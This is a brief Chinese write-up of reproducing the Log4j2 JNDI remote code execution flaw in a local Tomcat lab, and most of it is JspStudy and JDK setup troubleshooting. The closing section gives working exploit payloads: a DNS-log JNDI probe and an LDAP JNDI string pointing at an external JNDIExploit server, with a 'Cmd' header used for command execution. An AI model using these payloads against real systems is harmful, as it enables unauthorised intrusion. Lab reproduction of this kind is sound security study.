¶环境搭建
使用T00ls大佬的环境,war包放到webapps下重启tomcat即可
阅读本篇文章能了解到:apache, rce,Log4j2
这里我要多说几句,因为我用的jspstudy,搭建环境踩了不少坑,记录下,主要是jspstudy的坑
首先把war包放到webapps下并不会自解压,放到www一样不解压
解决方案:JspStudy\tomcat\conf文件夹下server.xml,注释掉<Context docBase="D:\JspStudy\WWW\" path=""></Context>,放到webapps即可自解压
设置根目录为D:\JspStudy\WWW\ROOT,访问http://127.0.0.1:8080,页面正常
提交payload,报500错
经查,大概是jdk版本问题,打开jdk目录查看java版本为1.7.0_60,盲猜版本过低
解决方案:安装jre1.832位,拷贝bin、lib目录,替换JspStudy\JDK\jre\,替换前先把bin目录下java-JspStudy.exe备份一份,替换后再拷贝进去
重启tomcat解决500错误,8错,nice,我已经准备不再用他了😅
¶RCE
¶1. dnslog
先使用dns测试漏洞
payload: ${jndi:ldap://redn3ck.xxx.ceye.io}
¶2. rce
下载https://github.com/0x727/JNDIExploit,跑起服务
payload: ${jndi:ldap://207.xxx.xxx.111:1389/TomcatBypass/TomcatEcho}
header中填入Cmd: cmd即可rce
¶参考链接
https://www.t00ls.cc/viewthread.php?tid=63695
https://www.t00ls.cc/viewthread.php?tid=63705